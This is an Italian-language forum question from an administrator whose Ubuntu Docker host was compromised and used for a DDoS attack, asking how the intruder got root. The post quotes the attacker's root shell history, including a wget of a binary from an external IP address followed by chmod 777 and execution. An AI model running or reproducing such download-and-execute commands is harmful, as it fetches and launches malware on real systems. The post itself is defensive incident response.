Attualmente ho un server compromesso (Ubuntu) che sta eseguendo tutti i servizi nei container Docker, ma ho trovato oggi un programma dannoso che stava generando un attacco DDOS.
Ho controllato tutti i servizi in Docker e sono ok, non sono stati compromessi, ma l'host era. Ho trovato un file eseguibile /AAK in Ubuntu che penso fosse l'attacco DDOS, e ho trovato nella cronologia di root le seguenti voci:
netstat -antup
chmod 777 AA
wget http://211.142.203.242:7410/AAK
chmod 777 AAK
./AAK
È chiaro per me che era l'origine dell'attacco, e controllando le porte aperte sul server, una porta casuale 10XX era aperta da questo processo, e un altro processo dannoso aveva una porta aperta.
Un'altra porta aperta: 80 (nginx in un contenitore di Docker), 22 (SSH, NON usando la password, usando invece i tasti), e 111 (era aperto di default e usato da rpcbind).
Come posso verificare in che modo l'autore dell'attacco ha avuto accesso come root al server? Se l'applicazione in un contenitore Docker non era l'origine, cosa avrebbe potuto causare questa violazione?
Non voglio ricreare il server solo per essere hackerato di nuovo utilizzando la stessa vulnerabilità.
Modifica: ho dimenticato di dire che stavo usando il plug-in vagabondo digitale oceano.